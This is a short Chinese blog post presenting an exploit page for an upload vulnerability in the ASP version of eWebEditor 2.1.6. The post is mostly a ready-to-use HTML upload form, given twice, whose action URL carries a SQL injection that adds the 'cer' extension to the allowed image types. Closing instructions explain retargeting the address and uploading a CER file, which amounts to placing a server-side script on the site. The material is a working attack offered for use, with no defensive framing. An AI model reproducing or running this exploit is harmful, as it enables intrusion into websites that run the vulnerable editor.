ewebeditor asp版 2.1.6 上传漏洞利用程序
<H1>ewebeditor asp版 2.1.6 上传漏洞利用程序—-</H1><br><br>
<form action=”http://127.1/e/upload.asp?action=save&type=IMAGE&style=luoye\’ union select S_ID,S_Name,S_Dir,S_CSS,S_UploadDir,S_Width,S_Height,S_Memo,S_IsSys,S_FileExt,S_FlashExt, [S_ImageExt]%2b\’|cer\’,S_MediaExt,S_FileSize,S_FlashSize,S_ImageSize,S_MediaSize,S_StateFlag,S_DetectFromWord,S_InitMode,S_BaseUrl from ewebeditor_style where s_name=\’standard\’and\’a\’=\’a” method=post name=myform enctype=”multipart/form-data”>
<input type=file name=uploadfile size=100><br><br>
<input type=submit value=Fuck>
</form>
<form action=”http://127.1/e/upload.asp?action=save&type=IMAGE&style=luoye\’ union select S_ID,S_Name,S_Dir,S_CSS,S_UploadDir,S_Width,S_Height,S_Memo,S_IsSys,S_FileExt,S_FlashExt, [S_ImageExt]%2b\’|cer\’,S_MediaExt,S_FileSize,S_FlashSize,S_ImageSize,S_MediaSize,S_StateFlag,S_DetectFromWord,S_InitMode,S_BaseUrl from ewebeditor_style where s_name=\’standard\’and\’a\’=\’a” method=post name=myform enctype=”multipart/form-data”>
<input type=file name=uploadfile size=100><br><br>
<input type=submit value=Fuck>
</form>
修改上传地址保存为HTM文件,打开可以直接上传CER文件,测试成功.上传后地址看源文件.
版权声明:本文为shanmao原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。